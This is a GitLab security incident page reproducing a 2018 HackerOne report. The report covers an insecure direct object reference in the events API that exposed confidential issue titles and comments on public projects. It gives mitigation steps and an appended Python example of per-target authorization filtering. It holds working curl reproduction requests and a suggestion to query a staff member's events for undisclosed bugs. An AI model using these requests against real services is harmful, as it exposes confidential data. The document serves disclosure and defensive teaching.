Incident created Sep 20, 2018 by Dennis Appelt (@dappelt, Developer)

Confidential Information Exposed in Events API Endpoint

Title:         [IDOR] Confidential Information Exposed in Events API Endpoint
Scope:         *.gitlab.com
Weakness:      Insecure Direct Object Reference (IDOR)
Severity:      No Rating
Link:          https://hackerone.com/reports/411647
Date:          2018-09-20 05:34:26 +0000
By:            @ngalog

Details: Intro: In https://docs.gitlab.com/ee/api/events.html, there is an events endpoint to track the contribution events of a specific user; however, this endpoint leaks a lot of sensitive information without proper authorization.

Description: An attacker could have read access to a public project's confidential issue titles, comments, reactions, etc.

Mitigation Summary

  • The issue was introduced in 9.3 with https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/11755, so there is no option to roll back GitLab.com to mitigate this problem.
  • The current proposed fix is in https://dev.gitlab.org/gitlab/gitlabhq/merge_requests/2514, which is slated to be in the next security release, https://gitlab.com/gitlab-org/gitlab-ce/issues/51048. As soon as this is ready we should prepare a post-deployment patch for GitLab.com.
  • In order to mitigate this on GitLab, the proposal is to globally block the events endpoint at HAProxy; this would mean blocking all requests to /api/v4/{users,projects}/<userid>/events.

Steps To Reproduce:

Command

 curl --header "PRIVATE-TOKEN: <API TOKEN>" https://gitlab.com/api/v4/users/2820780/events

Response

[{"project_id":8467633,"action_name":"commented on","target_id":102939716,"target_iid":102939716,"target_type":"Note","author_id":2820780,"target_title":"THIS IS SPARTA!","created_at":"2018-09-20T05:22:45.846Z","note":{"id":102939716,"type":null,"body":"Commenting with private password: password!!!","attachment":null,"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"created_at":"2018-09-20T05:22:45.724Z","updated_at":"2018-09-20T05:22:45.724Z","system":false,"noteable_id":14324424,"noteable_type":"Issue","resolvable":false,"noteable_iid":1},"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8467633,"action_name":"opened","target_id":14324424,"target_iid":1,"target_type":"Issue","author_id":2820780,"target_title":"THIS IS SPARTA!","created_at":"2018-09-20T05:22:07.001Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8467633,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-20T05:21:35.295Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8343565,"action_name":"commented on","target_id":102936748,"target_iid":102936748,"target_type":"Note","author_id":2820780,"target_title":"This is SPARTA","created_at":"2018-09-20T05:19:51.131Z","note":{"id":102936748,"type":null,"body":"entering private password here","attachment":null,"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"created_at":"2018-09-20T05:19:51.029Z","updated_at":"2018-09-20T05:19:51.029Z","system":false,"noteable_id":14324406,"noteable_type":"Issue","resolvable":false,"noteable_iid":3},"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8343565,"action_name":"opened","target_id":14324406,"target_iid":3,"target_type":"Issue","author_id":2820780,"target_title":"This is SPARTA","created_at":"2018-09-20T05:19:39.820Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8456252,"action_name":"opened","target_id":14295896,"target_iid":1,"target_type":"Issue","author_id":2820780,"target_title":"new issues","created_at":"2018-09-19T12:36:53.137Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8456252,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-19T12:34:39.579Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8430964,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-18T04:26:30.287Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337740,"action_name":"joined","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-11T23:31:15.659Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077590,"target_iid":6,"target_type":"Issue","author_id":2820780,"target_title":"private should not be tell","created_at":"2018-09-11T22:59:04.677Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077538,"target_iid":4,"target_type":"Issue","author_id":2820780,"target_title":"asdf","created_at":"2018-09-11T22:50:52.304Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077530,"target_iid":3,"target_type":"Issue","author_id":2820780,"target_title":"second or third issue","created_at":"2018-09-11T22:48:37.932Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077516,"target_iid":2,"target_type":"Issue","author_id":2820780,"target_title":"Awesomeproject","created_at":"2018-09-11T22:46:13.272Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077514,"target_iid":1,"target_type":"Issue","author_id":2820780,"target_title":"Awesomeproject","created_at":"2018-09-11T22:45:57.655Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-11T22:45:34.683Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"}]

You will be able to see the confidential issue I opened here https://gitlab.com/goldngalog3/publicproject/issues/1

You can't see it in the gitlab.com UI, but you can see it in the API response.

If you want to cause even more damage, just issue this command to view user @jritchey's activities, since it will disclose a lot of information about what existing bugs are in GitLab CE/EE/Runner:

 curl --header "PRIVATE-TOKEN: <API TOKEN>" https://gitlab.com/api/v4/users/1895698/events

PS: Private projects are not affected; only public projects with confidential issues are affected.

Impact

View confidential issues/comments/titles, etc., on public projects.
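The report above makes the root cause visible in the data itself: the events feed was filtered by project visibility (private projects were not affected) but not by the confidentiality of the issue each event points to, so an event of type "Note" or "Issue" in a public project carried a confidential title and note body out to anyone with a token. The following is an added example, not GitLab's code and not the fix in the linked merge request: a small Python model with constructed projects, issues, notes and events (field names follow the API response on this page; the records, the `REPORTER`-or-above access rule for confidential issues, and all function names are assumptions) that shows the project-only filter beside a filter that resolves each event to its target issue and applies the confidentiality check.

```python
"""Added example (not GitLab's code): project-level visibility filtering of an
events feed versus per-target filtering that also honours issue confidentiality.

All records below are constructed. Field names (target_type, target_id,
noteable_id, target_title) mirror the API response quoted in the report; the
access-level rule is an assumption for illustration.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed access levels (assumption): confidential issues are readable by
# the issue author or by project members at Reporter or above.
GUEST, REPORTER, MAINTAINER = 10, 20, 40


@dataclass
class Project:
    id: int
    public: bool
    members: dict  # user_id -> access level


@dataclass(frozen=True)
class Issue:
    id: int
    project_id: int
    author_id: int
    confidential: bool
    title: str


@dataclass(frozen=True)
class Note:
    id: int
    issue_id: int  # the API calls this noteable_id when noteable_type is "Issue"
    body: str


@dataclass(frozen=True)
class Event:
    action_name: str
    author_id: int
    project_id: int
    target_type: Optional[str]  # "Issue", "Note" or None ("created", "joined", ...)
    target_id: Optional[int]
    target_title: Optional[str]


# --- constructed sample data ---------------------------------------------
PUBLIC_PROJECT = Project(id=8467633, public=True, members={2820780: MAINTAINER})
PRIVATE_PROJECT = Project(id=9000001, public=False, members={2820780: MAINTAINER, 555: REPORTER})
PROJECTS = {p.id: p for p in (PUBLIC_PROJECT, PRIVATE_PROJECT)}

ISSUES = {
    14324424: Issue(14324424, 8467633, 2820780, confidential=True, title="THIS IS SPARTA!"),
    14324425: Issue(14324425, 8467633, 2820780, confidential=False, title="public issue"),
    14324426: Issue(14324426, 9000001, 2820780, confidential=False, title="private project issue"),
}
NOTES = {102939716: Note(102939716, 14324424, "Commenting with private password: password!!!")}

EVENTS = [
    Event("created", 2820780, 8467633, None, None, None),
    Event("opened", 2820780, 8467633, "Issue", 14324424, "THIS IS SPARTA!"),
    Event("commented on", 2820780, 8467633, "Note", 102939716, "THIS IS SPARTA!"),
    Event("opened", 2820780, 8467633, "Issue", 14324425, "public issue"),
    Event("opened", 2820780, 9000001, "Issue", 14324426, "private project issue"),
]


def can_read_project(project: Project, viewer_id: int) -> bool:
    return project.public or viewer_id in project.members


def can_read_issue(issue: Issue, viewer_id: int) -> bool:
    """Project visibility first, then the confidentiality rule (assumed rule)."""
    project = PROJECTS[issue.project_id]
    if not can_read_project(project, viewer_id):
        return False
    if not issue.confidential:
        return True
    return viewer_id == issue.author_id or project.members.get(viewer_id, 0) >= REPORTER


def issue_for_event(event: Event) -> Optional[Issue]:
    """Resolve the issue an event ultimately refers to, directly or via its note."""
    if event.target_type == "Issue":
        return ISSUES[event.target_id]
    if event.target_type == "Note":
        return ISSUES[NOTES[event.target_id].issue_id]
    return None  # project-level events such as "created" or "joined"


def events_project_check_only(events, viewer_id: int):
    """Insufficient filter: checks only the project, so confidential-issue events
    of a public project pass through (the behaviour the report describes)."""
    return [e for e in events if can_read_project(PROJECTS[e.project_id], viewer_id)]


def events_with_target_check(events, viewer_id: int):
    """Per-target filter: project visibility, then confidentiality of the target issue."""
    visible = []
    for e in events:
        if not can_read_project(PROJECTS[e.project_id], viewer_id):
            continue
        issue = issue_for_event(e)
        if issue is not None and not can_read_issue(issue, viewer_id):
            continue
        visible.append(e)
    return visible


def leaked_titles(events, viewer_id: int):
    """Titles the project-only filter returns that the per-target filter withholds."""
    strict = set(events_with_target_check(events, viewer_id))
    return sorted({e.target_title for e in events_project_check_only(events, viewer_id)
                   if e not in strict and e.target_title})


if __name__ == "__main__":
    outsider = 999999  # constructed: authenticated user who is a member of neither project
    print("leaked to outsider:", leaked_titles(EVENTS, outsider))
```

Run against the constructed data, the project-only filter hands an outsider four public-project events including the confidential title and the note that points at it, while the per-target filter returns only the "created" event and the non-confidential issue; a Reporter on the private project additionally sees that project's issue but still not the confidential one in the public project. The general point for any activity or audit feed is that the authorization check must be made on the object each event references, not on the container the event was recorded in.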

Edited Nov 22, 2018 by Dennis Appelt